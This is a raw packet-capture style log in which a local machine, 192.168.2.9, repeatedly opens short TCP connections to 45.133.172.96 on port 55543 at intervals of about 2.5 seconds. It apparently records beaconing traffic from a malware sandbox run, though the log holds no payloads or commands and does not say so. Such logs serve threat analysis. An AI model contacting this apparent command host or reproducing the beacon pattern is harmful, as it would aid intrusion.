Oct 3, 2024 09:27:53.463676929 CEST	55543	49712	45.133.172.96	192.168.2.9
Oct 3, 2024 09:27:55.051274061 CEST	55543	49712	45.133.172.96	192.168.2.9
Oct 3, 2024 09:27:55.051372051 CEST	49712	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:27:55.056114912 CEST	49712	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:27:55.060931921 CEST	55543	49712	45.133.172.96	192.168.2.9
Oct 3, 2024 09:27:56.076142073 CEST	49713	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:27:56.081058979 CEST	55543	49713	45.133.172.96	192.168.2.9
Oct 3, 2024 09:27:56.081279039 CEST	49713	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:27:56.087404966 CEST	49713	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:27:56.092271090 CEST	55543	49713	45.133.172.96	192.168.2.9
Oct 3, 2024 09:27:57.675416946 CEST	55543	49713	45.133.172.96	192.168.2.9
Oct 3, 2024 09:27:57.675496101 CEST	49713	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:27:57.675642967 CEST	49713	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:27:57.680377007 CEST	55543	49713	45.133.172.96	192.168.2.9
Oct 3, 2024 09:27:58.684077978 CEST	49714	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:27:58.689054966 CEST	55543	49714	45.133.172.96	192.168.2.9
Oct 3, 2024 09:27:58.689213991 CEST	49714	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:27:58.692842007 CEST	49714	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:27:58.697734118 CEST	55543	49714	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:00.284893990 CEST	55543	49714	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:00.285234928 CEST	49714	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:00.288434029 CEST	49714	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:00.293245077 CEST	55543	49714	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:01.293106079 CEST	49715	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:01.298190117 CEST	55543	49715	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:01.298329115 CEST	49715	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:01.302071095 CEST	49715	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:01.306929111 CEST	55543	49715	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:02.894296885 CEST	55543	49715	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:02.894399881 CEST	49715	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:02.894545078 CEST	49715	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:02.899336100 CEST	55543	49715	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:03.902476072 CEST	49716	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:03.907429934 CEST	55543	49716	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:03.907545090 CEST	49716	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:03.911520004 CEST	49716	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:03.916280985 CEST	55543	49716	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:05.505666971 CEST	55543	49716	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:05.505770922 CEST	49716	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:05.505845070 CEST	49716	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:05.511049032 CEST	55543	49716	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:06.511930943 CEST	49717	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:06.516897917 CEST	55543	49717	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:06.517021894 CEST	49717	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:06.520721912 CEST	49717	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:06.525578022 CEST	55543	49717	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:08.133358955 CEST	55543	49717	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:08.133666992 CEST	49717	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:08.133666992 CEST	49717	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:08.138624907 CEST	55543	49717	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:09.138274908 CEST	49718	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:09.143289089 CEST	55543	49718	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:09.143409967 CEST	49718	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:09.147111893 CEST	49718	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:09.151896954 CEST	55543	49718	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:10.775228024 CEST	55543	49718	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:10.775434017 CEST	49718	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:10.775500059 CEST	49718	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:10.780443907 CEST	55543	49718	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:11.777565956 CEST	49719	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:11.782543898 CEST	55543	49719	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:11.782655954 CEST	49719	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:11.786329031 CEST	49719	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:11.791176081 CEST	55543	49719	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:13.379100084 CEST	55543	49719	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:13.379220009 CEST	49719	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:13.379306078 CEST	49719	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:13.384100914 CEST	55543	49719	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:14.386850119 CEST	49720	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:14.391976118 CEST	55543	49720	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:14.392055035 CEST	49720	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:14.395766020 CEST	49720	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:14.400533915 CEST	55543	49720	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:15.987703085 CEST	55543	49720	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:15.987807989 CEST	49720	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:15.991095066 CEST	49720	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:15.995865107 CEST	55543	49720	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:16.997222900 CEST	49721	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:17.002098083 CEST	55543	49721	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:17.002213001 CEST	49721	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:17.005882025 CEST	49721	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:17.010631084 CEST	55543	49721	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:18.597649097 CEST	55543	49721	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:18.597744942 CEST	49721	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:18.601175070 CEST	49721	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:18.605899096 CEST	55543	49721	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:19.605459929 CEST	49722	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:19.610312939 CEST	55543	49722	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:19.610402107 CEST	49722	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:19.620846987 CEST	49722	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:19.625834942 CEST	55543	49722	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:21.208528042 CEST	55543	49722	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:21.208671093 CEST	49722	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:21.212219954 CEST	49722	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:21.217144966 CEST	55543	49722	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:22.214737892 CEST	49724	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:22.219588995 CEST	55543	49724	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:22.219706059 CEST	49724	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:22.223324060 CEST	49724	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:22.228085041 CEST	55543	49724	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:23.836251974 CEST	55543	49724	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:23.836374998 CEST	49724	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:23.836482048 CEST	49724	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:23.841341972 CEST	55543	49724	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:24.839905977 CEST	49725	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:24.844851971 CEST	55543	49725	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:24.844944000 CEST	49725	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:24.848895073 CEST	49725	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:24.853729010 CEST	55543	49725	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:26.462568045 CEST	55543	49725	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:26.462658882 CEST	49725	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:26.462735891 CEST	49725	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:26.467854023 CEST	55543	49725	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:27.464590073 CEST	49726	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:27.469647884 CEST	55543	49726	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:27.469742060 CEST	49726	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:27.479815960 CEST	49726	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:27.484652996 CEST	55543	49726	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:29.087285995 CEST	55543	49726	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:29.087430954 CEST	49726	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:29.087538004 CEST	49726	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:29.093672037 CEST	55543	49726	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:30.089663029 CEST	49727	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:30.095477104 CEST	55543	49727	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:30.095599890 CEST	49727	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:30.099330902 CEST	49727	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:30.105298996 CEST	55543	49727	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:31.709836960 CEST	55543	49727	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:31.709917068 CEST	49727	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:31.709989071 CEST	49727	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:31.715476990 CEST	55543	49727	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:32.715598106 CEST	49728	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:32.729675055 CEST	55543	49728	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:32.729749918 CEST	49728	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:32.733973026 CEST	49728	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:32.741977930 CEST	55543	49728	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:34.348690987 CEST	55543	49728	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:34.348932981 CEST	49728	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:34.349145889 CEST	49728	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:34.353883982 CEST	55543	49728	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:35.355365038 CEST	49729	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:35.360367060 CEST	55543	49729	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:35.360487938 CEST	49729	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:35.364130020 CEST	49729	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:35.368948936 CEST	55543	49729	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:36.989240885 CEST	55543	49729	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:36.989459038 CEST	49729	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:36.990739107 CEST	49729	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:36.996265888 CEST	55543	49729	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:37.996296883 CEST	49730	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:38.001337051 CEST	55543	49730	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:38.001492977 CEST	49730	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:38.010309935 CEST	49730	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:38.015347958 CEST	55543	49730	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:39.604203939 CEST	55543	49730	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:39.604379892 CEST	49730	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:39.604475975 CEST	49730	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:39.610394001 CEST	55543	49730	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:40.621521950 CEST	49731	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:40.626655102 CEST	55543	49731	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:40.626744032 CEST	49731	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:40.631412029 CEST	49731	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:40.636904001 CEST	55543	49731	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:42.244143009 CEST	55543	49731	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:42.244366884 CEST	49731	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:42.244482040 CEST	49731	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:42.250224113 CEST	55543	49731	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:43.246118069 CEST	49732	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:43.259201050 CEST	55543	49732	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:43.259284019 CEST	49732	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:43.263168097 CEST	49732	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:43.270073891 CEST	55543	49732	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:44.866781950 CEST	55543	49732	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:44.866920948 CEST	49732	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:44.867151022 CEST	49732	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:44.873788118 CEST	55543	49732	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:45.900698900 CEST	49733	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:45.909241915 CEST	55543	49733	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:45.909358025 CEST	49733	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:45.920850992 CEST	49733	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:45.928394079 CEST	55543	49733	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:47.510801077 CEST	55543	49733	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:47.510921001 CEST	49733	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:47.511162996 CEST	49733	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:47.521795988 CEST	55543	49733	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:48.528251886 CEST	49734	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:48.539792061 CEST	55543	49734	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:48.539886951 CEST	49734	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:48.543658972 CEST	49734	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:48.554045916 CEST	55543	49734	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:50.166565895 CEST	55543	49734	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:50.166659117 CEST	49734	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:50.166727066 CEST	49734	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:50.171756983 CEST	55543	49734	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:51.183334112 CEST	49735	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:51.188268900 CEST	55543	49735	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:51.188477039 CEST	49735	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:51.191909075 CEST	49735	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:51.196687937 CEST	55543	49735	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:52.790241957 CEST	55543	49735	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:52.790440083 CEST	49735	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:52.790479898 CEST	49735	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:52.796385050 CEST	55543	49735	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:53.792762995 CEST	49736	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:53.798160076 CEST	55543	49736	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:53.798260927 CEST	49736	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:53.802630901 CEST	49736	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:53.807437897 CEST	55543	49736	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:55.395278931 CEST	55543	49736	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:55.395364046 CEST	49736	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:55.395454884 CEST	49736	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:55.400235891 CEST	55543	49736	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:56.402535915 CEST	49737	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:56.407507896 CEST	55543	49737	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:56.407581091 CEST	49737	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:56.411228895 CEST	49737	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:56.416134119 CEST	55543	49737	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:58.004715919 CEST	55543	49737	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:58.004779100 CEST	49737	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:58.004828930 CEST	49737	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:58.009713888 CEST	55543	49737	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:59.011399984 CEST	49738	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:59.016269922 CEST	55543	49738	45.133.172.96	192.168.2.9
Oct 3, 2024 09:28:59.016366959 CEST	49738	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:59.019990921 CEST	49738	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:28:59.024663925 CEST	55543	49738	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:00.618043900 CEST	55543	49738	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:00.618113041 CEST	49738	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:00.618227005 CEST	49738	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:00.623217106 CEST	55543	49738	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:01.620811939 CEST	49739	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:01.625652075 CEST	55543	49739	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:01.625721931 CEST	49739	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:01.629287958 CEST	49739	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:01.634135008 CEST	55543	49739	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:03.227660894 CEST	55543	49739	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:03.227735996 CEST	49739	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:03.227834940 CEST	49739	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:03.232604027 CEST	55543	49739	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:04.230036974 CEST	49740	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:04.234931946 CEST	55543	49740	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:04.235023022 CEST	49740	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:04.238786936 CEST	49740	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:04.243643999 CEST	55543	49740	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:05.852863073 CEST	55543	49740	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:05.852941990 CEST	49740	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:05.852993011 CEST	49740	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:05.857799053 CEST	55543	49740	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:06.855420113 CEST	49741	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:06.860424042 CEST	55543	49741	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:06.860511065 CEST	49741	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:06.864370108 CEST	49741	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:06.869170904 CEST	55543	49741	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:08.460138083 CEST	55543	49741	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:08.460259914 CEST	49741	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:08.460316896 CEST	49741	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:08.465226889 CEST	55543	49741	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:09.464570045 CEST	49742	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:09.469513893 CEST	55543	49742	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:09.469636917 CEST	49742	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:09.474205971 CEST	49742	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:09.479154110 CEST	55543	49742	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:11.068065882 CEST	55543	49742	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:11.068136930 CEST	49742	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:11.068253040 CEST	49742	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:11.074647903 CEST	55543	49742	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:12.042680979 CEST	49743	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:12.047585964 CEST	55543	49743	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:12.047679901 CEST	49743	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:12.051538944 CEST	49743	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:12.056405067 CEST	55543	49743	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:13.645901918 CEST	55543	49743	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:13.645987988 CEST	49743	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:13.646033049 CEST	49743	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:13.650897980 CEST	55543	49743	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:14.590970993 CEST	49744	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:14.596034050 CEST	55543	49744	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:14.596204042 CEST	49744	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:14.602431059 CEST	49744	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:14.607212067 CEST	55543	49744	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:16.194556952 CEST	55543	49744	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:16.194855928 CEST	49744	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:16.194855928 CEST	49744	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:16.199923038 CEST	55543	49744	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:17.105441093 CEST	49745	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:17.110511065 CEST	55543	49745	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:17.110593081 CEST	49745	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:17.115020990 CEST	49745	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:17.119972944 CEST	55543	49745	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:19.071880102 CEST	55543	49745	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:19.072082043 CEST	55543	49745	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:19.072156906 CEST	49745	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:19.072192907 CEST	49745	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:19.081398010 CEST	55543	49745	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:19.948925972 CEST	49746	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:19.954093933 CEST	55543	49746	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:19.955708981 CEST	49746	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:19.959209919 CEST	49746	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:19.964226007 CEST	55543	49746	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:21.554223061 CEST	55543	49746	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:21.554421902 CEST	49746	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:21.556296110 CEST	49746	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:21.561105967 CEST	55543	49746	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:22.401998043 CEST	49747	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:22.406949043 CEST	55543	49747	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:22.407018900 CEST	49747	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:22.410550117 CEST	49747	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:22.415361881 CEST	55543	49747	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:24.005254984 CEST	55543	49747	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:24.005393982 CEST	49747	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:24.005460024 CEST	49747	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:24.010278940 CEST	55543	49747	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:24.823942900 CEST	49748	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:24.929672956 CEST	55543	49748	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:24.929760933 CEST	49748	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:24.934257030 CEST	49748	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:24.939145088 CEST	55543	49748	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:26.521004915 CEST	55543	49748	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:26.521435976 CEST	49748	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:26.521435976 CEST	49748	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:26.526340008 CEST	55543	49748	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:27.323980093 CEST	49749	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:27.329139948 CEST	55543	49749	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:27.329248905 CEST	49749	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:27.333134890 CEST	49749	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:27.338068008 CEST	55543	49749	45.133.172.96	192.168.2.9
